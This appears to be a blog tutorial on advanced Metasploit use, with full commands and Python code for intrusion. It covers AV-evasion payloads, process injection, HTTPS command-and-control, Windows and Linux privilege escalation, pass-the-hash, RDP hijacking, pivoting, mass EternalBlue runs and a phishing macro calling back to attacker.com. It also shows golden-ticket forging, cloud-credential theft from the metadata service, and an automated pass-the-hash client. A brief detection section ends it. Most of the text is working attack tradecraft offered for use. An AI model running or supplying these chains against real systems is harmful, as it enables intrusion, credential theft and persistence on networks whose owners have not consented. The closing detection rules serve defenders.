Sunday, 29 June 2025

The Ultimate Metasploit Mastery Guide: Advanced to Pro, Part 2


Metasploit: From Advanced to Pro – Exploit Like a Nation-State Hacker

Introduction

You’ve mastered the basics of Metasploit—now it’s time to operate like a professional penetration tester or red teamer. This guide dives into advanced exploitation, evasion, automation, and real-world attack chains with detailed command breakdowns.


Table of Contents

  1. Advanced Exploit Customization

  2. Stealthy Payloads & Evasion

  3. Post-Exploitation Mastery

  4. Lateral Movement & Pivoting

  5. Automation & API Integration

  6. Real-World Attack Walkthroughs

  7. Defensive Countermeasures


1. Advanced Exploit Customization

Manual Exploit Tweaking

Public exploits sometimes fail against a specific environment because the target runs a different build, has been patched, or carries a mitigation the module does not account for. Metasploit loads modules from ~/.msf4/modules in addition to its own tree, so the safe way to adapt one is to copy it there under a new name and edit the copy, leaving the framework's own file untouched:

Example: Modifying a Public Exploit

  1. Locate the exploit and copy it into your personal module tree. The subdirectory must mirror the original path, because the module's name is derived from where it sits:

    bash
    locate ms17_010_eternalblue.rb
    mkdir -p ~/.msf4/modules/exploits/windows/smb
    cp /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb \
       ~/.msf4/modules/exploits/windows/smb/custom_eternalblue.rb
  2. Edit the copy. What to adjust depends on the module (offsets, a return address, a ROP chain, grooming sizes); per-build values normally live in the Targets array. The snippet shows the generic Targets convention for a module keyed on a return address. EternalBlue's own target entries are structured differently, so read the module before changing anything:

    ruby
    # Generic Targets entry: the hash holds the per-target values the exploit reads
    'Targets' => [
      [ 'Windows 10 x64', { 'Ret' => 0x0000000140000000 } ]
    ]
  3. Reload and select the copy (rename the module's 'Name' as well, or the two will be hard to tell apart in search output):

    msfconsole
    reload_all
    use exploit/windows/smb/custom_eternalblue
    info

Key Exploit Options

msfconsole
set VERBOSE true                # Print the module's debugging output
check                           # Run the module's check method before firing (not every module implements one)
set DisablePayloadHandler true  # Don't start a handler here; you are running one elsewhere (e.g. multi/handler on another host)
show advanced                   # Per-module advanced options; local exploits expose ForceExploit to run even when check fails

2. Stealthy Payloads & Evasion

AV/EDR Bypass Techniques

1. Payload Encoding

bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 \
  -a x64 --platform windows -e x64/xor_dynamic -i 10 -b '\x00' -f exe -o payload_encoded.exe
  • -e x64/xor_dynamic: The encoder must match the payload architecture. x86/shikata_ga_nai only encodes x86 payloads, so pairing it with an x64 payload makes msfvenom fail because no encoder can encode the buffer.

  • -i 10: Encode 10 times, each layer with a fresh key, so the encoded bytes differ on every build.

  • -b '\x00': Bytes the output must avoid; removing bad characters is what encoders are actually for.

  • -f exe: Output format.

Encoders were built for bad-character avoidance, not antivirus evasion: the decoder stub in front of the encoded bytes has the same structure on every build and has long been signatured, so stacking iterations rarely changes a verdict. Test the binary against the target's actual AV in a lab before relying on it.
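To make the encoder behaviour concrete, here is an added simulation (my own illustrative code, not Metasploit's encoder, and with no real decoder stub): an additive-feedback XOR in the shape of shikata_ga_nai's decoder loop, applied in layers the way -i does. SAMPLE_PAYLOAD and SIGNATURE are constructed bytes, not shellcode.

```python
import os
import struct

# Constructed stand-in for a payload: not real shellcode, just bytes with a
# recognisable prefix that a naive byte-pattern scanner could key on.
SIGNATURE = b"\xfc\x48\x83\xe4\xf0"
SAMPLE_PAYLOAD = SIGNATURE + b"\xe8" + bytes(range(0x10, 0x40)) + b"\xff\xd5"   # 56 bytes


def _pad4(buf: bytes) -> bytes:
    """Pad with NOPs to a 4-byte boundary so the dword loop covers every byte."""
    return buf + b"\x90" * (-len(buf) % 4)


def xor_feedback_encode(buf: bytes, key: int) -> bytes:
    """One layer: XOR each dword with the running key, then advance the key by the
    plaintext dword. Same xor-then-add shape as shikata_ga_nai's decoder loop,
    which is why no two keys produce the same ciphertext."""
    out = bytearray()
    for (dword,) in struct.iter_unpack("<I", _pad4(buf)):
        out += struct.pack("<I", dword ^ key)
        key = (key + dword) & 0xFFFFFFFF
    return bytes(out)


def xor_feedback_decode(buf: bytes, key: int) -> bytes:
    """What the decoder stub does in memory at run time."""
    out = bytearray()
    for (dword,) in struct.iter_unpack("<I", buf):
        plain = dword ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & 0xFFFFFFFF
    return bytes(out)


def encode_layers(buf: bytes, iterations: int, rng=os.urandom):
    """msfvenom -i N: N layers, each with a fresh random key.
    Returns (keys in decode order, encoded bytes)."""
    keys = []
    for _ in range(iterations):
        key = struct.unpack("<I", rng(4))[0] or 1    # avoid the identity key 0
        buf = xor_feedback_encode(buf, key)
        keys.append(key)
    return keys[::-1], buf


def decode_layers(buf: bytes, keys) -> bytes:
    for key in keys:
        buf = xor_feedback_decode(buf, key)
    return buf


def signature_present(blob: bytes, signature: bytes = SIGNATURE) -> bool:
    """The kind of check a static byte-signature engine performs."""
    return signature in blob
```

Run it twice and the encoded bytes differ while decode_layers returns the same payload, which is all "polymorphic" means here. In a real encoded payload those bytes sit behind a decoder stub whose structure (GetPC trick, loop, feedback add) is the same on every build, and that structure is what signatures match; -i 10 only re-encodes the already-encoded buffer behind the same outer stub.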

2. Process Injection (Move Into a Legitimate Process)

meterpreter
ps              # Pick a long-lived process of the same architecture as your payload (e.g. explorer.exe)
migrate 1234    # Move this Meterpreter into it; the original process can then exit

msfconsole
use post/windows/manage/payload_inject   # Alternative: start a second payload inside another process
set SESSION 1
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 10.0.0.5
set LPORT 443
set PID 1234
run

Both are remote-thread injection, not process hollowing (which starts a suspended process and replaces its image before it runs). Either way the implant ends up as an unbacked executable region inside a signed process, which is exactly what EDR memory scans look for.

3. HTTPS Beaconing (C2 Traffic That Looks Like Web Browsing)

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST secure.c2server.com           # Hostname the stager resolves (a placeholder here); the handler does not bind to it
set LPORT 443
set ReverseListenerBindAddress 0.0.0.0  # What the handler actually listens on
set HandlerSSLCert /path/to/cert.pem    # PEM holding both the certificate and its private key
set StagerVerifySSLCert true            # Stager aborts unless the server cert matches the one baked into it
exploit -j

Use a real certificate for a domain you control. A certificate generated on the fly by the handler is itself an indicator, and so are the default stager URI and User-Agent (see HttpUserAgent under show advanced).

3. Post-Exploitation Mastery

Privilege Escalation (Windows)

1. Token Impersonation

meterpreter
getprivs                                    # Needs SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
load incognito
list_tokens -u                              # Delegation tokens work over the network; impersonation tokens only on this host
impersonate_token "NT AUTHORITY\\SYSTEM"
getuid                                      # Confirm the new identity

2. Kernel and Service Exploits

meterpreter
run post/multi/recon/local_exploit_suggester   # Runs each local exploit's check method against this session
background

msfconsole
search cve-2021-1675                           # PrintNightmare; module paths change between releases, so search first
use <module path from the search output>
set SESSION 1
set LHOST 10.0.0.5
check
exploit

Kernel exploits can crash the host. Prefer a service or misconfiguration exploit when the suggester offers one, and snapshot test machines first.

Linux Privilege Escalation

shell (on the target)
find / -perm -4000 -type f 2>/dev/null         # SUID binaries; anything outside the distro's default set deserves a look
uname -r                                       # Dirty Pipe needs a kernel >= 5.8 that is older than 5.16.11 / 5.15.25 / 5.10.102

msfconsole
use exploit/linux/local/cve_2022_0847_dirtypipe
set SESSION 2
set LHOST 10.0.0.5
check
exploit

4. Lateral Movement & Pivoting

1. Pass-the-Hash (SMB)

msfconsole
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.20
set SMBDomain .                  # Local account; give the domain name for a domain account
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0  # LM:NT; the LM half is the "no LM hash" constant and this NT half is the hash of an empty password, so substitute the one you dumped
set LHOST 10.0.0.5
exploit

psexec needs local administrator rights on the target. For local accounts other than the built-in RID-500 Administrator, UAC's remote restrictions strip the admin token over the network unless LocalAccountTokenFilterPolicy is set, so a valid hash can still fail.
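What the LM:NT string actually is, as an added example (my own code, not Metasploit's): the NT hash is an unsalted MD4 of the UTF-16LE password, which is exactly why holding the hash is as good as holding the password for NTLM authentication. The page's sample value is the NT hash of an empty password, so the helper flags it. MD4 is implemented inline because OpenSSL 3 builds hide it behind the legacy provider and hashlib.new('md4') often fails.

```python
import struct


def _rotl(x: int, s: int) -> int:
    x &= 0xFFFFFFFF
    return ((x << s) | (x >> (32 - s))) & 0xFFFFFFFF


# Round function, additive constant, message-word order and shift amounts
# per round, straight from RFC 1320.
_ROUNDS = (
    (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
     list(range(16)), (3, 7, 11, 19)),
    (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
     [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
    (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
     [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320): pad, then 3 rounds of 16 steps per 64-byte block."""
    bit_len = (len(data) * 8) & 0xFFFFFFFFFFFFFFFF
    data += b"\x80" + b"\x00" * ((56 - (len(data) + 1) % 64) % 64)
    data += struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        s = state[:]
        for fn, const, order, shifts in _ROUNDS:
            for i in range(16):
                t = (4 - i % 4) % 4                  # a, d, c, b are updated in turn
                x, y, z = s[(t + 1) % 4], s[(t + 2) % 4], s[(t + 3) % 4]
                s[t] = _rotl(s[t] + fn(x, y, z) + X[order[i]] + const, shifts[i % 4])
        state = [(a + b) & 0xFFFFFFFF for a, b in zip(state, s)]
    return struct.pack("<4I", *state)


# LM hash of an empty string, which is also what a dump shows when LM hashing is
# disabled. Metasploit's SMBPass wants LM:NT, so this is the LM half to supply
# when only the NT hash is known.
BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)). No salt: the same password gives the same
    hash on every machine, which is what makes pass-the-hash possible."""
    return md4(password.encode("utf-16-le")).hex()


def smbpass(nt_hex: str, lm_hex: str = BLANK_LM) -> str:
    """Build the value for `set SMBPass` from a dumped NT hash (and optional LM hash)."""
    nt_hex, lm_hex = nt_hex.lower(), lm_hex.lower()
    for h in (nt_hex, lm_hex):
        if len(h) != 32 or any(c not in "0123456789abcdef" for c in h):
            raise ValueError(f"not a 16-byte hex hash: {h!r}")
    return f"{lm_hex}:{nt_hex}"


def is_blank_password(smbpass_value: str) -> bool:
    """True if the NT half is the hash of the empty string, i.e. a placeholder, not a real credential."""
    return smbpass_value.split(":")[-1].lower() == nt_hash("")
```

Because the hash is unsalted, a hash pulled from LSASS on one host authenticates to every host where that account has the same password; that is the whole reason local administrator password reuse is the lateral-movement gift it is.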

2. RDP Session Hijacking

meterpreter
getsystem                        # Attaching to another user's session needs SYSTEM
shell

cmd (on the target, as SYSTEM)
query user                       # Lists sessions with ID, state (Active/Disc) and user
tscon 2 /dest:console            # Attach disconnected session 2 to your console session, no password required (use rdp-tcp#N if you are in over RDP)

This puts the victim's desktop in front of you. Meterpreter's steal_token <PID> is the quieter relative: take the token of a process running in that user's session and act as them without ever touching the desktop.

3. Pivoting (Route Through a Compromised Host)

meterpreter
run post/multi/manage/autoroute SUBNET=10.1.1.0 NETMASK=255.255.255.0   # run autoroute -s 10.1.1.0/24 is the older form
background

msfconsole
route print                      # Confirm the subnet is attached to the session
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.1.1.1-254
set PORTS 22,80,135,139,445,3389
set THREADS 10
run

Only Metasploit modules use these routes. To push other tools through the pivot, start auxiliary/server/socks_proxy and point proxychains at it, or use Meterpreter's portfwd for a single port.

5. Automation & API Integration

1. Metasploit Resource Scripts

bash
# auto_pwn.rc: msfconsole commands, one per line (<ruby> ... </ruby> blocks are also allowed)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.0/24
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 10.0.0.5
set LPORT 443
# THREADS is a scanner option and does nothing on an exploit
check            # Exploits accept a range too; EternalBlue can blue-screen hosts, so confirm vulnerability first
exploit -j -z    # Run as a background job and don't auto-interact with sessions

Run with:

bash
msfconsole -r auto_pwn.rc

2. Python Automation (MSFRPC)

python
# Start the RPC daemon first; -S disables TLS to match ssl=False below:
#   msfrpcd -U msf -P password -S
import msfrpc

client = msfrpc.Msfrpc({'host': '127.0.0.1', 'port': 55553, 'ssl': False})
client.login('msf', 'password')

# module.execute returns right away with a job id and uuid; the session shows up later
job = client.call('module.execute', ['exploit', 'windows/smb/psexec', {
    'RHOSTS': '192.168.1.10',
    'SMBUser': 'Administrator',
    'SMBPass': 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0',
    'PAYLOAD': 'windows/meterpreter/reverse_tcp',
    'LHOST': '10.0.0.5',
    'LPORT': '4444'
}])
print(job)                                # {'job_id': ..., 'uuid': ...}
print(client.call('session.list'))        # Poll this until the new session appears
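The msfrpc library hides the wire protocol and the call sequence. The added client below (my own code, not the msfrpc or pymetasploit3 libraries) shows what an automated run actually does against msfrpcd: auth.login, then module.execute, then polling session.list until a session whose exploit_uuid matches the job appears, then meterpreter_write/read. The endpoint and credentials are assumptions matching the page's example, the real transport needs the third-party msgpack package, and the transport is injectable so the flow can be exercised against a fake daemon.

```python
import time
import urllib.request

# Assumed msfrpcd endpoint and credentials, matching the page's example:
#   msfrpcd -U msf -P password -S        (-S: plain HTTP, no TLS)
RPC_URL = "http://127.0.0.1:55553/api/"


def http_transport(method: str, args: list):
    """Real transport: POST msgpack([method, *args]) to msfrpcd and decode the reply.
    Needs the third-party 'msgpack' package, imported lazily so the rest of this
    file (and a fake-transport test) runs without it."""
    import msgpack
    req = urllib.request.Request(
        RPC_URL, data=msgpack.packb([method, *args]),
        headers={"Content-Type": "binary/message-pack"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        # session.list is keyed by integer session ids, which msgpack>=1.0 rejects unless told otherwise
        return msgpack.unpackb(resp.read(), raw=False, strict_map_key=False)


class MsfRpc:
    def __init__(self, transport=http_transport):
        self._transport = transport
        self.token = None

    def login(self, user: str, password: str) -> str:
        res = self._transport("auth.login", [user, password])
        if res.get("result") != "success":
            raise RuntimeError(f"login failed: {res}")
        self.token = res["token"]
        return self.token

    def call(self, method: str, *args):
        """Every authenticated method takes the session token as its first argument."""
        res = self._transport(method, [self.token, *args])
        if isinstance(res, dict) and res.get("error"):
            raise RuntimeError(f"{method}: {res.get('error_message', res)}")
        return res

    def run_exploit(self, module: str, opts: dict) -> str:
        """module.execute returns at once with a job id and uuid; nothing has landed yet."""
        return self.call("module.execute", "exploit", module, opts)["uuid"]

    def wait_for_session(self, exploit_uuid: str, timeout: float = 120, poll: float = 2.0) -> int:
        """Poll session.list until a session whose exploit_uuid matches our job shows up.
        Matching on the uuid rather than 'any new session' keeps concurrent jobs apart."""
        deadline = time.monotonic() + timeout
        while True:
            for sid, info in self.call("session.list").items():
                if info.get("exploit_uuid") == exploit_uuid:
                    return int(sid)
            if time.monotonic() >= deadline:
                raise TimeoutError(f"no session for job {exploit_uuid} within {timeout}s")
            time.sleep(poll)

    def meterpreter(self, sid: int, command: str, settle: float = 1.0) -> str:
        """Send one Meterpreter command and collect whatever output has arrived."""
        self.call("session.meterpreter_write", sid, command + "\n")
        time.sleep(settle)
        return self.call("session.meterpreter_read", sid)["data"]


def pass_the_hash(rpc: MsfRpc, target: str, user: str, lm_nt: str, lhost: str, settle: float = 1.0):
    """Fire psexec with an LM:NT hash, wait for the session, and prove the identity."""
    uuid = rpc.run_exploit("windows/smb/psexec", {
        "RHOSTS": target, "SMBUser": user, "SMBPass": lm_nt,
        "PAYLOAD": "windows/x64/meterpreter/reverse_https",
        "LHOST": lhost, "LPORT": 443,
    })
    sid = rpc.wait_for_session(uuid, timeout=60)
    return sid, rpc.meterpreter(sid, "getuid", settle=settle)


if __name__ == "__main__":
    rpc = MsfRpc()                     # live msfrpcd via http_transport
    rpc.login("msf", "password")
    print(pass_the_hash(rpc, "192.168.1.10", "Administrator",
                        "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0",
                        "10.0.0.5"))
```

Two things the page's snippet glosses over and this makes explicit: msfrpcd reports failures as a dict with error set rather than by HTTP status, and a single meterpreter_read after a fixed delay may return partial output, so production scripts loop on read until the command's prompt appears.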

6. Real-World Attack Walkthroughs

Scenario 1: Phishing → Exploit → Domain Admin

  1. Build the macro payload and embed it in an Office document (attacker.com is a placeholder for your C2 hostname):

    bash
    msfvenom -p windows/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f vba -o macro.txt
  2. Start the handler before sending, then wait for the callback:

    msfconsole
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_https
    set LHOST attacker.com
    set LPORT 443
    set ReverseListenerBindAddress 0.0.0.0
    exploit -j
  3. Escalate to Domain Admin, then persist. DCSync requires replication rights, which normally means you are already DA, so it comes after dumping credentials on hosts where a DA has logged on and moving to one of those accounts:

    meterpreter
    load kiwi
    creds_all                                       # LSASS secrets on this host; look for a DA logon
    dcsync_ntlm DOMAIN\\krbtgt                      # From a DA context: replicate the krbtgt NT hash without touching the DC's disk
    golden_ticket_create -d DOMAIN -u FAKEUSER -s S-1-5-21-... -k <krbtgt NT hash> -t /tmp/golden.kirbi
    kerberos_ticket_use /tmp/golden.kirbi           # Load the forged TGT; it stays valid until krbtgt's password is rotated twice

Scenario 2: Web App → Docker Escape → Cloud Compromise

  1. Exploit the vulnerable web app. Struts has several modules, one per bug, so match the app's version (search struts2 lists them; CVE-2017-5638 is shown as one example):

    msfconsole
    search struts2
    use exploit/multi/http/struts2_content_type_ognl
    set RHOSTS app.target.com
    set TARGETURI /        # Path of the Struts application
    set LHOST 10.0.0.5
    exploit
  2. Find out whether you landed in a container, and whether it is breakable. Escape is never automatic; it needs a misconfiguration such as --privileged, a mounted Docker socket, or a writable cgroup release_agent:

    meterpreter
    checkcontainer                    # Reports Docker/LXC/etc. from the session's point of view
    shell

    shell (in the container)
    ls -la /var/run/docker.sock       # A mounted Docker socket is root on the host
    grep CapEff /proc/self/status     # 0000003fffffffff means every capability, i.e. --privileged
    cat /proc/1/cgroup

    msfconsole
    search docker                     # Local exploits for the known escape vectors; run check before exploit
  3. Steal cloud credentials. /proc/self/environ is NUL-separated, so convert it before grepping, and ask the instance metadata service, which hands out the instance role's temporary keys:

    bash
    tr '\0' '\n' < /proc/self/environ | grep -i 'AWS_'
    curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/   # IMDSv1; IMDSv2 needs a token from a PUT to /latest/api/token first
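The same credential hunt done properly, as an added example (my own code, not from the page): parse the environment on NUL boundaries, pick out provider variables and anything secret-looking, scan for access key IDs embedded in other values, and query IMDSv2 the way a live instance requires. The environ content is constructed, the AWS key pair is AWS's documented example pair rather than a real credential, and the IMDS helper only works from inside an EC2 instance.

```python
import json
import re
import urllib.request

# Constructed /proc/self/environ content: NUL-separated KEY=VALUE pairs exactly
# as the kernel exposes them. The access key pair is AWS's published example
# (AKIAIOSFODNN7EXAMPLE / wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY), not a live credential.
SAMPLE_ENVIRON = (
    b"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin\0"
    b"HOSTNAME=web-7f9c\0"
    b"AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\0"
    b"AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\0"
    b"AWS_DEFAULT_REGION=eu-west-1\0"
    b"DB_PASSWORD=hunter2\0"
    b"HOME=/root\0"
)

CLOUD_PREFIXES = ("AWS_", "AZURE_", "GOOGLE_", "GCP_", "VAULT_")
SECRET_WORDS = ("PASSWORD", "SECRET", "TOKEN", "KEY")
# AWS access key IDs: AKIA (long-term user key) or ASIA (STS temporary key) + 16 chars
AKID_RE = re.compile(rb"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")

IMDS = "http://169.254.169.254"


def parse_environ(raw: bytes) -> dict:
    """Split on NUL, not newline: grep treats the file as one line, which is why
    `cat /proc/self/environ | grep` prints everything mashed together."""
    env = {}
    for entry in raw.split(b"\0"):
        if b"=" in entry:
            key, value = entry.split(b"=", 1)
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def find_credentials(raw: bytes) -> dict:
    """Pick out cloud/provider variables and anything that looks like a secret,
    plus any access key IDs embedded in unrelated values."""
    env = parse_environ(raw)
    secrets = {k: v for k, v in env.items()
               if k.startswith(CLOUD_PREFIXES) or any(w in k.upper() for w in SECRET_WORDS)}
    key_ids = sorted({m.group().decode() for m in AKID_RE.finditer(raw)})
    return {"secrets": secrets, "access_key_ids": key_ids}


def fetch_instance_role_credentials(timeout: float = 2.0) -> dict:
    """Live-instance only: IMDSv2 handshake (PUT for a token, then GET with it)
    to pull the instance role's temporary keys. From a container this fails when
    the instance's IMDS hop limit is 1, which is the default for IMDSv2."""
    req = urllib.request.Request(f"{IMDS}/latest/api/token", method="PUT",
                                 headers={"X-aws-ec2-metadata-token-ttl-seconds": "300"})
    with urllib.request.urlopen(req, timeout=timeout) as r:
        token = r.read().decode()
    hdr = {"X-aws-ec2-metadata-token": token}
    base = f"{IMDS}/latest/meta-data/iam/security-credentials/"
    with urllib.request.urlopen(urllib.request.Request(base, headers=hdr), timeout=timeout) as r:
        role = r.read().decode().strip()
    with urllib.request.urlopen(urllib.request.Request(base + role, headers=hdr), timeout=timeout) as r:
        return json.loads(r.read())        # AccessKeyId, SecretAccessKey, Token, Expiration
```

The role credentials from IMDS are temporary and carry a session Token, so all three values have to be exported together (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN); an ASIA key without its token is useless.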

7. Defensive Countermeasures

How Blue Teams Detect Metasploit

  • Network signatures: the default reverse_http(s) stager URIs and User-Agent, the unencrypted Meterpreter stage DLL sent over reverse_tcp, and a handler certificate generated on the fly are all covered by IDS rules.

  • Process anomalies: an Office application spawning cmd.exe, powershell.exe or rundll32.exe; an implant appearing in an unexpected process after migrate; unsigned binaries executing from user-writable paths.

  • Log anomalies: bursts of network logons (Event ID 4624/4625 with logon type 3) from one source as psexec or a scanner walks the subnet, service installs (Event ID 7045, which psexec's service binary leaves behind), and cleared event logs (Event ID 1102).
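The log side of this, as an added detection example (my own code, not from the page): a sliding-window rule over the events the section names, run against a constructed handful of records rather than real logs. The record shape (timestamp, EventID, source, LogonType) is a simplification of what a SIEM would hand you.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed event records (not real logs), reduced to the fields that matter:
# (timestamp, EventID, source address or "-", LogonType or None)
SAMPLE_EVENTS = [
    ("2025-06-29T10:00:00", 4625, "10.0.0.5", 3),        # failed network logon
    ("2025-06-29T10:00:01", 4625, "10.0.0.5", 3),
    ("2025-06-29T10:00:01", 4625, "10.0.0.5", 3),
    ("2025-06-29T10:00:02", 4625, "10.0.0.5", 3),
    ("2025-06-29T10:00:02", 4624, "10.0.0.5", 3),        # ...then the hash works
    ("2025-06-29T10:00:03", 7045, "-", None),            # psexec installs its service
    ("2025-06-29T10:02:00", 4624, "192.168.1.40", 3),    # an ordinary file-share logon
    ("2025-06-29T10:15:00", 1102, "-", None),            # clearev wiped the Security log
]


def detect(events, burst_threshold=5, window=timedelta(seconds=10)):
    """Return (rule, source, timestamp) alerts for: a burst of network (type 3)
    logon events from one source inside `window`, a service install, and an
    audit-log clear. Events are processed in time order."""
    alerts = []
    recent = defaultdict(deque)                 # source -> timestamps still inside the window
    for ts_str, event_id, src, logon_type in sorted(events, key=lambda e: e[0]):
        ts = datetime.fromisoformat(ts_str)
        if event_id in (4624, 4625) and logon_type == 3:
            q = recent[src]
            q.append(ts)
            while ts - q[0] > window:           # slide the window forward
                q.popleft()
            if len(q) == burst_threshold:       # fire once, when the threshold is first crossed
                alerts.append(("network_logon_burst", src, ts_str))
        elif event_id == 7045:
            alerts.append(("service_installed", src, ts_str))
        elif event_id == 1102:
            alerts.append(("audit_log_cleared", src, ts_str))
    return alerts
```

Counting successful and failed type-3 logons together is deliberate: a pass-the-hash spray produces a short run of 4625s ending in a 4624, and a rule that only watches failures goes quiet at exactly the moment the attacker gets in. The 1102 rule is the counterpart to the clearev advice below; wiping the log is itself the loudest event in it.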

Evasion Checklist

✅ Use encrypted transports (reverse_https with a real certificate; DNS tunneling where egress is restricted).
✅ Avoid the default Meterpreter stagers, URIs and User-Agent; customize or replace the C2 channel.
✅ Treat log tampering as a last resort: clearev wipes whole event logs and itself writes a 1102 "audit log cleared" event, and timestomp only changes $STANDARD_INFORMATION timestamps, which forensic tools compare against $FILE_NAME.


Conclusion

You're now equipped with the advanced Metasploit techniques professional operators rely on. Key takeaways:

  • Adapted exploits succeed where stock modules fail against patched or unusual targets.

  • Evasion is critical for red team ops, and every evasion step leaves its own trace; know what each one writes to the logs.

  • Automation scales attacks, and scales mistakes with them, so check before you exploit.

What’s next?

  • Practice on Advanced HackTheBox machines.

  • Learn C2 frameworks (Cobalt Strike, Sliver).

  • Study real-world APT reports for tradecraft.

🚀 Time to go pro! 🚀
